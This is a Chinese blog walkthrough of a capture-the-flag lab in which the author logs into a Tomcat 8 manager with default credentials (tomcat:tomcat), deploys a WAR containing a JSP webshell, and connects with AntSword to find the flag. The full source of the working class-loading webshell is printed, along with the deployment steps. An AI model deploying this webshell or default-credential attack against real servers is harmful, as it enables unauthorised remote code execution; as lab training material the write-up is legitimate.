当前位置:   article > 正文

安鸾渗透实战平台(中间件)tomcat8弱口令 (100分)_中间件弱口令

中间件弱口令

漏洞环境

安鸾渗透实战平台
蚂剑
一句话木马(jsp)

题目:

在这里插入图片描述

访问对应站点

1、访问站点
在这里插入图片描述
2、尝试登录
http://106.15.50.112:18081/manager/status
tomcat弱口令登录,常规:root:root;admin:admin;tomcat:tomcat;
在这里插入图片描述
这里使用tomcat;tomcat登录成功

3、找到部署点
http://106.15.50.112:18081/manager/html/list
在这里插入图片描述

准备一句话木马

1、编写一句话木马(密码是passwd)

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27

2、把他改格式为.jsp并使用压缩软件压成zip后再把他该成.war
在这里插入图片描述

网页端上传

在这里插入图片描述

在这里插入图片描述
上传后提示文件存在
在这里插入图片描述
改个名字
在这里插入图片描述
上传成功
在这里插入图片描述这里也会多一个目录
在这里插入图片描述由于马是在该目录下解压的,我们就访问对应url就行,白板证明有效
http://106.15.50.112:18081/zzzz/zzzz.jsp
在这里插入图片描述
使用蚁剑链接
在这里插入图片描述
在这里插入图片描述
????说好在根目录下呢,中国人不骗中国人!!
在这里插入图片描述

那就用蚁剑的命令行用find来找吧,非要前后加通配符才找到…

find / -name *flag*
  • 1

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小惠珠哦/article/detail/1005828
推荐阅读
相关标签
  

闽ICP备14008679号